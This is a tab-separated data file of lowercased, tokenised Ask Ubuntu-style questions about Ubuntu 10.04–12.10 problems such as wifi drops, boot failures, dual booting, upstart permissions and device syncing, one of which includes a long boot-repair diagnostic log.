229787	wifi connections issue drops with 12.10	ok i know this has been ask around several times but i cant seem to find a fix for mine exactly . my samsung series 5 ultra book was running windows 8 and i removed it and installed ubuntu 12.10. i started noticing that i would loose my internet connection from my galaxy note ii hotspot . the only way to get the internet working again is to reboot the laptop . the internet seems to work about 20-30 mins before it happens . if someone could assist me in what i need to update i would appreciate it .
229788	failed to load file , wo n't boot	i am a new user of ubuntu and do n't know much about computers . i have used ubuntu for about 3 weeks now , everythings been fine , but i got this message today : microcode : failed to load file amd-ucode/microcode_amd.bin it will not boot past this screen now . i am currently using my old laptop to ask this question . any ideas ?
229790	ubuntu glitches up when i boot it	i recently installed ubuntu on an old laptop of mine , and i am having some problems . i installed everything and followed the guide like it said , but , when i try to boot up from hard drive it displays the desktop , but everything starts to glitch out and i ca n't click on any applications or scroll over them without it glitching , proceeded by a lock-up . i might re-install it to see if it helps , but if not , you guys got to help me out . pc specs : hp compaq presario v6000 amd sempron ( 1.8ghz ) nvidia geforce go 6150 80gb harddrive 2gb of ram
229792	ubuntu does n't recognize my samsung sch-r580 phone in usb	i plug my samsung sch-r580 cellphone with a micro sd card into my ubuntu 12.10 desktop computer and the computer does n't even know that it 's connected . the phone says `` connected to pc '' but not the pc . and i do n't have a micro sd card adapter . i want to be able to put files onto my phone and take files off of it . any suggestions ?
229794	ho do i install ubuntu on my mac powerpc g5	how do i install ubuntu on my powerpc g5 ? which version do i download ? where do i download it from ? and how do i get it to install ? i tried burning ubuntu powerpc 12.04 and booting from the cd and all i get is a dos like setup prompt `` boot : '' i 've tried 'live ' and everything else listed when i push tab ; but , every time i get a bunch of white text on black screen , then black text on white and then my monitor just goes black and nothing happens ? ? ? what am i doing wrong ? any suggestions ?
229799	ubuntu 12.04.1 lts breaking down and sluggish	i am in the process of switching from windows to a linux based system and am currently deciding between distributions ... i am currently trying ubuntu as wubi . i find that my experience is not very smooth and streamlined for example , crash-reports , bugs , applications taking time to run etc etc ( this in spite of the fact that i am very patient and am constantly researching solution to different driver and application issues ) . was wondering if this is because i am running through ntfs right now or is it just like this ? looking to switch to linux because of its opensource nature , interest in software development in college as well as maximizing the potential of my machine . i am running an amd quadcore-x64 2.2ghz , 6gb ram and 750 gb hdd on an hp g6 notebook . i would appreciate any honest opinions .
229800	how to auto start openvpn ( client ) on ubuntu cli ?	i have an *.ovpn file that works if i type in sudo openvpn client.ovpn now i would like to start up openvpn when i boot the computer . it 's a headless version of ubuntu if that matters . 12.04 64bit . how can i do this ? thanks
229801	when i shutdown the computer , it restarts	i am unable to shutdown . whenever i try to shutdown , it reboots . i am running ubuntu 64bit 12.10 . it is a desktop pc . no dual boot . i had windows 7 before . the graphics driver is amd radeon hd6670.motherboard is intel . i have run the boot-repair and this is the result : boot info script 0.61.full + boot-repair extra info [ boot-info november 20th 2012 ] ============================= boot info summary : =============================== = > grub2 ( v2.00 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 1 for ( , msdos1 ) /boot/grub . sda1 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 12.10 boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/i386-pc/core.img sda2 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 1,936,809,983 1,936,807,936 83 linux /dev/sda2 1,936,812,030 1,953,523,711 16,711,682 5 extended /dev/sda5 1,936,812,032 1,953,523,711 16,711,680 82 linux swap / solaris '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 229a5484-7659-4ce1-98ce-2f05f61a1ffa ext4 /dev/sda5 6c6dca25-ab67-4de4-8602-26fdb6154781 swap /dev/sr0 iso9660 ubuntu 12.10 amd64 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) =========================== sda1/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 229a5484-7659-4ce1-98ce-2f05f61a1ffa else search -- no-floppy -- fs-uuid -- set=root 229a5484-7659-4ce1-98ce-2f05f61a1ffa fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=10 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-229a5484-7659-4ce1-98ce-2f05f61a1ffa ' { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 229a5484-7659-4ce1-98ce-2f05f61a1ffa else search -- no-floppy -- fs-uuid -- set=root 229a5484-7659-4ce1-98ce-2f05f61a1ffa fi linux /boot/vmlinuz-3.5.0-19-generic root=uuid=229a5484-7659-4ce1-98ce-2f05f61a1ffa ro quiet splash acpi=force $ vt_handoff initrd /boot/initrd.img-3.5.0-19-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-229a5484-7659-4ce1-98ce-2f05f61a1ffa ' { menuentry 'ubuntu , with linux 3.5.0-19-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-19-generic-advanced-229a5484-7659-4ce1-98ce-2f05f61a1ffa ' { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 229a5484-7659-4ce1-98ce-2f05f61a1ffa else search -- no-floppy -- fs-uuid -- set=root 229a5484-7659-4ce1-98ce-2f05f61a1ffa fi echo 'loading linux 3.5.0-19-generic ... ' linux /boot/vmlinuz-3.5.0-19-generic root=uuid=229a5484-7659-4ce1-98ce-2f05f61a1ffa ro quiet splash acpi=force $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-19-generic } menuentry 'ubuntu , with linux 3.5.0-19-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-19-generic-recovery-229a5484-7659-4ce1-98ce-2f05f61a1ffa ' { recordfail insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 229a5484-7659-4ce1-98ce-2f05f61a1ffa else search -- no-floppy -- fs-uuid -- set=root 229a5484-7659-4ce1-98ce-2f05f61a1ffa fi echo 'loading linux 3.5.0-19-generic ... ' linux /boot/vmlinuz-3.5.0-19-generic root=uuid=229a5484-7659-4ce1-98ce-2f05f61a1ffa ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-19-generic } menuentry 'ubuntu , with linux 3.5.0-17-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-17-generic-advanced-229a5484-7659-4ce1-98ce-2f05f61a1ffa ' { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 229a5484-7659-4ce1-98ce-2f05f61a1ffa else search -- no-floppy -- fs-uuid -- set=root 229a5484-7659-4ce1-98ce-2f05f61a1ffa fi echo 'loading linux 3.5.0-17-generic ... ' linux /boot/vmlinuz-3.5.0-17-generic root=uuid=229a5484-7659-4ce1-98ce-2f05f61a1ffa ro quiet splash acpi=force $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-17-generic } menuentry 'ubuntu , with linux 3.5.0-17-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-17-generic-recovery-229a5484-7659-4ce1-98ce-2f05f61a1ffa ' { recordfail insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 229a5484-7659-4ce1-98ce-2f05f61a1ffa else search -- no-floppy -- fs-uuid -- set=root 229a5484-7659-4ce1-98ce-2f05f61a1ffa fi echo 'loading linux 3.5.0-17-generic ... ' linux /boot/vmlinuz-3.5.0-17-generic root=uuid=229a5484-7659-4ce1-98ce-2f05f61a1ffa ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-17-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 229a5484-7659-4ce1-98ce-2f05f61a1ffa else search -- no-floppy -- fs-uuid -- set=root 229a5484-7659-4ce1-98ce-2f05f61a1ffa fi linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 229a5484-7659-4ce1-98ce-2f05f61a1ffa else search -- no-floppy -- fs-uuid -- set=root 229a5484-7659-4ce1-98ce-2f05f61a1ffa fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda1/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=229a5484-7659-4ce1-98ce-2f05f61a1ffa / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=6c6dca25-ab67-4de4-8602-26fdb6154781 none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) 200.155235291 = 214.915047424 boot/grub/grub.cfg 1 40.280788422 = 43.251167232 boot/initrd.img-3.5.0-17-generic 1 2.468288422 = 2.650304512 boot/initrd.img-3.5.0-19-generic 1 200.149234772 = 214.908604416 boot/vmlinuz-3.5.0-17-generic 1 1.990135193 = 2.136891392 boot/vmlinuz-3.5.0-19-generic 1 2.468288422 = 2.650304512 initrd.img 1 1.990135193 = 2.136891392 vmlinuz 1 1.990135193 = 2.136891392 vmlinuz.old 1 =============================== stderr messages : =============================== cat : write error : broken pipe file descriptor 8 ( /proc/6297/mounts ) leaked on lvscan invocation . parent pid 13390 : bash no volume groups found additional information : =================== log of boot-repair 2012-12-17__01h53 =================== boot-repair version : 3.197~ppa1~quantal boot-sav version : 3.197~ppa1~quantal glade2script version : 3.2.2~ppa45~quantal boot-sav-extra version : 3.197~ppa1~quantal boot-repair is executed in live-session ( ubuntu 12.10 , quantal , ubuntu , x86_64 ) cpu op-mode ( s ) : 32-bit , 64-bit file=/cdrom/preseed/ubuntu.seed boot=casper initrd=/casper/initrd.lz quiet splash -- maybe-ubiquity =================== os-prober : /dev/sda1 : ubuntu 12.10 ( 12.10 ) : ubuntu : linux =================== blkid : /dev/loop0 : type= '' squashfs '' /dev/sr0 : label= '' ubuntu 12.10 amd64 '' type= '' iso9660 '' /dev/sda1 : uuid= '' 229a5484-7659-4ce1-98ce-2f05f61a1ffa '' type= '' ext4 '' /dev/sda5 : uuid= '' 6c6dca25-ab67-4de4-8602-26fdb6154781 '' type= '' swap '' 1 disks with os , 1 os : 1 linux , 0 macos , 0 windows , 0 unknown type os . warning : extended partition does not start at a cylinder boundary . dos and linux will interpret the contents differently . =================== sda1/etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash acpi=force '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' =================== sda1/etc/grub.d/ : drwxr-xr-x 2 root root 4096 oct 17 14:59 grub.d total 72 -rwxr-xr-x 1 root root 7541 oct 14 17:36 00_header -rwxr-xr-x 1 root root 5488 oct 4 09:30 05_debian_theme -rwxr-xr-x 1 root root 10891 oct 14 17:36 10_linux -rwxr-xr-x 1 root root 10258 oct 14 17:36 20_linux_xen -rwxr-xr-x 1 root root 1688 oct 11 14:10 20_memtest86+ -rwxr-xr-x 1 root root 10976 oct 14 17:36 30_os-prober -rwxr-xr-x 1 root root 1426 oct 14 17:36 30_uefi-firmware -rwxr-xr-x 1 root root 214 oct 14 17:36 40_custom -rwxr-xr-x 1 root root 216 oct 14 17:36 41_custom -rw-r -- r -- 1 root root 483 oct 14 17:36 readme =================== uefi/legacy mode : this live-session is not in efi-mode . secureboot maybe enabled . =================== partitions & disks : sda1 : sda , not-sepboot , grubenv-ok grub2 , grub-pc , update-grub , 64 , with-boot , is-os , not -- efi -- part , fstab-without-boot , fstab-without-efi , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , apt-get , grub-install , with -- usr , fstab-without-usr , not-sep-usr , standard , farbios , /mnt/boot-sav/sda1 . sda : not-gpt , biosboot-not-needed , has-no-efipart , not-usb , has-os , 2048 sectors * 512 bytes =================== parted -l : model : ata st1000dm003-1ch1 ( scsi ) disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 992gb 992gb primary ext4 boot 2 992gb 1000gb 8556mb extended 5 992gb 1000gb 8556mb logical linux-swap ( v1 ) warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! =================== parted -lm : byt ; /dev/sda:1000gb : scsi:512:4096 : msdos : ata st1000dm003-1ch1 ; 1:1049kb:992gb:992gb : ext4 : :boot ; 2:992gb:1000gb:8556mb : : : ; 5:992gb:1000gb:8556mb : linux-swap ( v1 ) : : ; warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! =================== mount : /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sr0 on /cdrom type iso9660 ( ro , noatime ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) gvfsd-fuse on /run/user/ubuntu/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=ubuntu ) /dev/sda1 on /mnt/boot-sav/sda1 type ext4 ( rw ) =================== ls : /sys/block/sda ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro sda1 sda2 sda5 size slaves stat subsystem trace uevent /sys/block/sr0 ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /dev ( filtered ) : alarm ashmem autofs binder block bsg btrfs-control bus cdrom cdrw char console core cpu cpu_dma_latency disk dri dvd dvdrw ecryptfs fb0 fd full fuse fw0 hidraw0 hidraw1 hpet input kmsg kvm log mapper mcelog mei mem net network_latency network_throughput null oldmem port ppp psaux ptmx pts random rfkill rtc rtc0 sda sda1 sda2 sda5 sg0 sg1 shm snapshot snd sr0 stderr stdin stdout uinput urandom usb vga_arbiter vhost-net zero ls /dev/mapper : control =================== df -th : filesystem type size used avail use % mounted on /cow overlayfs 3.9g 100m 3.8g 3 % / udev devtmpfs 3.9g 12k 3.9g 1 % /dev tmpfs tmpfs 1.6g 864k 1.6g 1 % /run /dev/sr0 iso9660 763m 763m 0 100 % /cdrom /dev/loop0 squashfs 717m 717m 0 100 % /rofs tmpfs tmpfs 3.9g 32k 3.9g 1 % /tmp none tmpfs 5.0m 4.0k 5.0m 1 % /run/lock none tmpfs 3.9g 176k 3.9g 1 % /run/shm none tmpfs 100m 52k 100m 1 % /run/user /dev/sda1 ext4 910g 26g 838g 3 % /mnt/boot-sav/sda1 =================== fdisk -l : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000da1e9 device boot start end blocks id system /dev/sda1 * 2048 1936809983 968403968 83 linux /dev/sda2 1936812030 1953523711 8355841 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 1936812032 1953523711 8355840 82 linux swap / solaris partition outside the disk detected . =================== recommended repair recommended-repair this setting will reinstall the grub2 of sda1 into the mbr of sda . additional repair will be performed : unhide-bootmenu-10s unhide grub boot menu in sda1/etc/default/grub grub-install ( grub ) 2.00-7ubuntu11 , grub-install ( grub ) 2 . reinstall the grub of sda1 into the mbr of sda installation finished . no error reported . grub-install /dev/sda : exit code of grub-install /dev/sda:0 chroot /mnt/boot-sav/sda1 update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-3.5.0-19-generic found initrd image : /boot/initrd.img-3.5.0-19-generic found linux image : /boot/vmlinuz-3.5.0-17-generic found initrd image : /boot/initrd.img-3.5.0-17-generic found memtest86+ image : /boot/memtest86+.bin unhide grub boot menu in sda1/boot/grub/grub.cfg boot successfully repaired . you can now reboot your computer .
229806	dreamweaver 8 not starting on ubuntu 10.04	i 've been trying to start dreamweaver 8 in wine with winetricks installed in ubuntu 10.04lts and it would simply show that it was loading and then stop , so i decided to try in the terminal to see what i would get and i recieve . wine dreamweaver.exe err : module : attach_process_dlls `` odbc32.dll '' failed to initialize , aborting err : module : ldrinitializethunk main exe initialization for l '' c : \\program files\\macromedia\\dreamweaver 8\\dreamweaver.exe '' failed , status c0000005 doxramos @ doxramos-laptop : ~/.wine/drive_c/program files/macromedia/dreamweaver 8 $ odbc32.dll is installed within the libraries and is in my system32 folder inside of wine . does anyone know what could cause this issue ? thanks in advance .
229808	if i boot from a usb drive will i still be able to use my usb drive for other things ?	i want to try out ubuntu but i want to load it onto a usb drive first , if i do this can i still use my usb drive for other storage or will it become completely dedicated to running ubuntu ?
229809	allow non-sudo group to control upstart job	i 'm trying to set up an upstart job to run on system startup , and that can also be started/stopped by members of a group other than sudo . with a previous version , i usedupdate-rc.d and scripts stored in /etc/init.d/ to get this working by adding % group all = nopasswd : /etc/init.d/scriptname to my sudoers file , but i ca n't seem to get an equivalent working for upstart . i tried adding % group all = nopasswd : /sbin/initctl start jobname to the sudoers file , but trying to run the command start jobname produces this error : start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.21 '' ( uid=1000 pid=5148 comm= '' start jobname `` interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) as near as i can tell , that 's a complaint about how my user account is n't given the power to send 'start ' messages in the d-bus config file for upstart . i have n't been able to actually find any information on how to edit that file to give a group permission to access a specific service -- does such an option exist ? is there a way to edit the sudoers file so i can run the job without editing the config file ? am i better off just sticking with the previous version ?
229813	screen become dimmer when the screen object with dark background grows bigger	i have this funny issue where my screen will goes dimmer , when the window with dark background grows bigger . in the reverse , my screen will goes brighter when majority of the screen have white background . i am using it with dell xps 15z on ubuntu 12.04 .
229814	does the removal of i386 from the kernel mean ubuntu is dropping 32 bit support ?	i saw recently that the i386 cpu is not going to be supported in the linux kernel 3.8 so does that mean that ubuntu will only be available in the coming years in 64-bit ?
229817	how to see the lists of my videos in shotwell ?	i made an import from my camera ( photos and videos ) , and after imported them , the `` last sync '' item , shows me the photos and videos i 've recently imported . but if i click any event in the `` events '' tree ( left side ) , only shows my photos ... how to see my videos imported that day also ? using shotwell 0.12.3 ( default in ubuntu 12.10 ) last import preview : event preview :
229826	opengl libraries for ubuntu running on virtual box	i am having ubuntu 10.04 running on virtualbox . guest additions are installed successfully . but guest additions do not provide the opengl library . to run open gl demo what needs to be installed . some google links suggest mesa utils . by my understanding is mesa utils do not use vbox drivers to achieve hardware acceleration . ubuntu 10.04 is running on virtualbox and not on bare metal . the host comprise of zx400 cpu with nvidia graphics driver . but this is not relevant since i would be using the vbox drivers provided by guest additions on virtualbox . in this scenario how do i get opengl libraries on ubuntu ? . ( specially i am looking for solution other than mesa , since mesa has support only for vmware and not for virtualbox ) how to get opengl libraries which use vbox drivers for 3d hardware accleration ? ? as i already mentioned , ubuntu 10.04 is running on virtualbox and not on bare metal . the host comprise of zx400 cpu with nvidia graphics driver . but this is not relevant since i would be using the vbox drivers provided by guest additions on virtualbox . in this scenario how to i get opengl libraries on ubuntu . ( especially i am looking for solution other than mesa , since mesa has support only for vmware and not for virtualbox thank you
229827	windows 7 and ubuntu boot issue	i had the idea to dual boot win 7 and ubuntu and what i did was the following : made a clean install of win 7 using all of my hard drive , next i used the ubuntu live cd and gparted to partition my drive to be the following : /dev/sda1 ext4 20gb ( linux root ) /dev/sda2 ntfs 100gb ( win7 ) /dev/sda3 ext4 350gb ( home ) /dev/sda4 extended 4gb ( swap ) the thing is , when installing ubuntu i deleted the partition win 7 creates for its boot sector and recovery and then resized the drive to look like what i mentioned , and ubuntu installed grub to the mbr . when grub boots i can see ubuntu but not windows , how can i chainload it ? or should i fix the windows mbr with the windows 7 installation disk and try to set the dual boot from there ? i do n't really care which one of the 2 bootloaders i end up using , i just want the dual boot to work out . thanks
229828	how many languages are available in the ubuntu distributions ?	do you know if there are statistics on how many languages ubuntu supports ( completely translated / partially translated ) ? i 've tried the following command : apt-cache search language-pack | grep `` base '' | grep -v `` gnome '' | grep -v `` kde '' | grep -v `` inkscape '' | wc -l which returned 140 results . but , i guess many of the translations are only partially done and not very good . so how do i find out more about high quality translations ?
229830	server does n't want to connect to the wired network	i just got home and moved my server from my apartment to my house , and for some reason my ubuntu server does n't want to obtain an ip from our router . it is setup for a dynamic ip , and it was working perfectly fine before i moved it . i 'm currently getting a `` waiting for network configuration ... '' during boot before it times out . my /etc/network/interfaces file looks like : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp i 've also tried setting a static ip but no other computer on my network can hit it . as i 've said , i changed nothing to the network config , the only thing that changed was the network setup and both places i 'm really lost and would appreciate any help , thank you !
229832	sync android with rhythmbox	i have a samsung mini 2 and my wife has an original samsung 2 . i am working with rhythmbox on 12.10 . i was initially able to sync my mini with rb when i first set up . then i deleted all the music that i had synced ... but now , it will no longer sync with rb . rb can see it and can poll it and tell how much space there is etc ... .but the sync button is grayed out . i originally thought that i must have deleted a special file when i deleted the first set of music . however , when testing with my wife 's phone , the same problem exists . i can drag and drop from various folders on my pc on to the phone ... but it just wo n't sync via rb . i tried the empty file .is_audio_player but that had no effect .
